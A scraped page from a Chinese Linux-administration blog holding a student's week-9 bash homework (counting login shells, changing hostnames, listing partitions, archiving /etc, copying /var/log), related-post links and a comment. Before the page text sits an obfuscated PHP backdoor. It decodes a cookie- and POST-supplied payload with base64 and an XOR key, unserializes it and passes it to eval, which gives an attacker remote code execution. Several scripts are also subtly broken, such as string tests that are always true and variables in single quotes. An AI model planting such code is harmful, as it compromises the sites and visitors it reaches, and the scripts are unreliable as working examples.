$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 马哥教育网络班20期+第9周课程练习 | Linux运维部落

马哥教育网络班20期+第9周课程练习

1、写一个脚本,判断当前系统上所有用户的shell是否为可登录shell(即用户的shell不是/sbin/nologin);分别这两类用户的个数;通过字符串比较来实现;

#!/bin/bash
declare -i other=0
declare -i nologin=0
for i in $(cut -d: -f7 /etc/passwd);do
if [ $i==/sbin/nologin ];then
let nologin++
else
let other++
fi
done
echo "other user total:$other"
echo "nologin user total:$nologin"

2、写一个脚本

(1) 获取当前主机的主机名,保存于hostname变量中;

(2) 判断此变量的值是否为localhost,如果是,则将当前主机名修改为www.magedu.com;

(3) 否则,则显示当前主机名;

#!/bin/bash
hostname=$(hostname)
if [ $hostname=='localhost' ];then
    hostname www.magedu.com
    echo "hostnamme change : 'www.magedu.com'."
else
    echo 'hostname is: $hostname'
fi

3、写一个脚本,完成如下功能

(1) 传递一个磁盘设备文件路径给脚本,判断此设备是否存在;

(2) 如果存在,则显示此设备上的所有分区信息;

#!/bin/bash
read -p "Enter a disk path:" disk
[ -z "$disk" ]&&echo "please input true path!"&&exit 1
    if fdisk -l | grep "^Disk $disk";then
        fdisk -l $disk
    else
        echo "Wrong disk path!"
        exit 2
    fi

4、写一个脚本,完成如下功能

脚本能够接受一个参数;

(1) 如果参数1为quit,则显示退出脚本,并执行正常退出;

(2) 如果参数1为yes,则显示继续执行脚本;

(3) 否则,参数1为其它任意值,均执行非正常退出;

#!/bin/bash
cat<<EOF
quit)exit script
yes)continue script
==================================
EOF
read -p "Enter a option:" option
case $option in
quit)
    echo "Exit!"
    exit 0
    ;;
yes)
    echo "yes!continue!"
    ;;
*)
    echo "force exit!"
    exit 1;;
esac

5、写一个脚本,完成如下功能

传递一个参数给脚本,此参数为gzip、bzip2或者xz三者之一;

(1) 如果参数1的值为gzip,则使用tar和gzip归档压缩/etc目录至/backups目录中,并命名为/backups/etc-20160613.tar.gz;

(2) 如果参数1的值为bzip2,则使用tar和bzip2归档压缩/etc目录至/backups目录中,并命名为/backups/etc-20160613.tar.bz2;

(3) 如果参数1的值为xz,则使用tar和xz归档压缩/etc目录至/backups目录中,并命名为/backups/etc-20160613.tar.xz;

(4) 其它任意值,则显示错误压缩工具,并执行非正常退出;

#!/bin/bash
cat<<EOF
 gzip) use tar and gzip;
bzip2) use tar and bzip2;
   xz) use tar and xz;
==================================
EOF
read -p "Enter a option:" option
case $option in
gzip)
    mkdir /backups &> /dev/null
    tar czvf /backups/etc-20160613.tar.gz /etc &> /dev/null
    echo "gzip success!"
    exit 0
    ;;
bzip2)
    mkdir /backups &> /dev/null
    tar cjvf /backups/etc-20160613.tar.bz2 /etc &> /dev/null
    exit 0
    ;;
xz)
    mkdir /backups &> /dev/null
    tar cJvf /backups/etc-20160613.tar.xz /etc &> /dev/null
    echo "xz success!"
    exit 0
    ;;
*)
    exit "force exit!"
    exit 12
    ;;
esac

6、写一个脚本,接受一个路径参数:

(1) 如果为普通文件,则说明其可被正常访问;

(2) 如果是目录文件,则说明可对其使用cd命令;

(3) 如果为符号链接文件,则说明是个访问路径;

(4) 其它为无法判断;

#!/bin/bash
read -p "Enter a file :" filename
if [ -z "$filename" ];then
    echo "please enter a true file path."
    exit 2
fi
if [ ! -e $filename ];then
    echo "No such file."
    exit 3
fi
if [ -f $filename ];then
    echo "$filename is a common file."
elif [ -d $filename ];then
    echo "$filename is a directory file. You can use 'cd'."
elif [ -L $filename ];then
    echo "$filename is a symbolic link file."
else
    echo "Unknow file type."
fi

7、写一个脚本,取得当前主机的主机名,判断

(1) 如果主机名为空或为localhost,或为"(none)",则将其命名为mail.magedu.com;

(2) 否则,显示现有的主机名即可;

#!/bin/bash
changename(){
    hostname mail.magedu.com
    echo "hostnamme change : 'mail.magedu.com'."
}
if [ $hostname=='localhost' ];then
    changename
elif [ $hostname=='none' ];then
    changename
else
    echo 'hostname is: $hostname'
fi

8、写一脚本,接受一个用户名为参数;

(1) 如果用户的id号为0,则显示其为管理员;

(2) 如果用户的id号大于0且小于500, 则显示其为系统用户;

(3) 否则,则显示其为普通用户;

#!/bin/bash
read -p "Enter a username:" user
if id $user &> /dev/null;then
    uid=`id -u $user`
else
    echo "please enter a true username!"
    exit 0
fi
if [ $uid -eq 0 ];then
    echo "$user is root user."
elif [ $uid -lt 500 ]&&[ $uid -gt 0 ];then
    echo "$user is system user."
else
    echo "$user is common user."
fi

10、写一个脚本,传递一个用户名参数给脚本;

(1) 如果用户的id号大于等于500,且其默认shell为以sh结尾的字符串,则显示“a user can log system.”类的字符串;

(2) 否则,则显示无法登录系统;

#/bin/bash
read -p "Enter a username:" user
if id $user &> /dev/null;then
uid=`id -u $user`
else
echo "please enter a true username!"
exit 0
fi
if [ $uid -ge 500 ];then
if `grep "^$user" /etc/passwd | grep sh$ &> /dev/null`;then
echo "a user can log system."
fi
else
echo "$user can't log system"
fi

11、写一个脚本,完成如下任务 :

(1) 按顺序分别复制/var/log目录下的每个直接文件或子目录至/tmp/test1-testn目录中;

(2) 复制目录时,才使用cp -r命令;

(3) 复制文件时使用cp命令;

(4) 复制链接文件时使用cp -d命令;

(5) 余下的所有类型,使用cp -a命令;

 #!/bin/bash
ddir=/tmp/test1-testn
if [ ! -d $ddir ];then
    mkdir -pv /tmp/test1-testn
fi
cd /var/log
for file in `ls /var/log`;do
    if [ -d $file ];then
        cp -r $file $ddir
    elif [ -f $file ];then
        cp $file $ddir
    elif [ -L $file ];then
        cp -d $file $ddir
    else
        cp -a $file $ddir
    fi
done
echo "OK! finish!"

原创文章,作者:二极管,如若转载,请注明出处:http://www.178linux.com/31629

(0)
上一篇 2016-08-08 16:17
下一篇 2016-08-08 20:10

相关推荐

  • 马哥教育网络班20期-第八周课程作业

    1、请描述网桥、集线器、二层交换机、三层交换机、路由器的功能、使用场景与区别。 网桥将两个相似的网络连接起来,并对网络数据的流通进行管理。它工作于数据链路层,不但能扩展网络的距离或范围,而且可提高网络的性能、可靠性和安全性。 集线器的英文称为“Hub”。主要功能是对接收到的信号进行再生整形放大,以扩大网络的传输距离,同时把所有节点集中在以它为中心的节点上。它…

    学员作品 2016-09-08
  • sed 流编辑器使用详解

    一、Stream EDitor, 行编辑器   sed是一种流编辑器,它一次处理一行内容。处理时,把当前处理的行存储在临时缓冲区中,称为“模式空间”(pattern space),接着用sed命令处理缓冲区中的内容,处理完成后,把缓冲区的内容送往屏幕。接着处理下一行,这样不断重复,直到文件末尾。文件内容并没有改变,除非你使用重定向存储输出…

    2016-08-10
  • 正则表达式

    grep:Global search REgular expression and Print out the line         文本搜索工具,根据用户指定的”模式“对目标文本逐行进行匹配检查;打印匹配到的行        模式:由正则表达式字符及文本字符所编写的过滤条件…

    Linux干货 2016-08-08
  • sed和vim的爱恨纠缠

    处理文本的工具sed sed是一种流编辑器,它一次处理一行内容。处理时,把当前处理的行存储在临时缓冲区中,称为“模式空间”(patternspace),接着用sed命令处理缓冲区中的内容,处理完成后,把缓冲区的内容送往屏幕。接着处理下一行,这样不断重复,直到文件末尾。文件内容并没有改变,除非你使用重定向存储输出。Sed主要用来自动编辑一个或多个文件,简化对文…

    2016-08-10
  • 马哥教育网络第20期-第一周作业

    第一周博客作业1、 描述计算机的组成及其功能。 运算器、控制器、存储器、输入设备、输出设备运算器、控制器 :cpu 运算和逻辑计算存储器:缓存和保存数据输入设备、输出设备:用户和计算机交互设备和界面 2、 按系列罗列Linux的发行版,并描述不同发行版之间的联系与区别。 Slackware系列: suse   opensuse debian系列: …

    学员作品 2016-06-23
  • 这个寒冬,如何赶走职场之“霾”

    在父母眼中,我的工作应该是这样的。。。 在朋友眼中,我的工作应该是这样的。。。 在女朋友眼中,我的工作应该是这样的。。。 其实我是这样的。。。 每当夜深人静的时候,我总会站在阳台上,独自一个人陷入沉思,究竟是谁走漏了风声,搞的大家都知道我穷(搬砖的)。。。。 面对每个月干瘪瘪的钱包和房东突然间给的惊喜房租要涨,有种想跳槽的冲动,但是互联网寒冬被大家传的神乎其…

    2015-12-10

评论列表(1条)

  • 马哥教育
    马哥教育 2016-08-17 14:23

    写的很好,排版也很棒,加油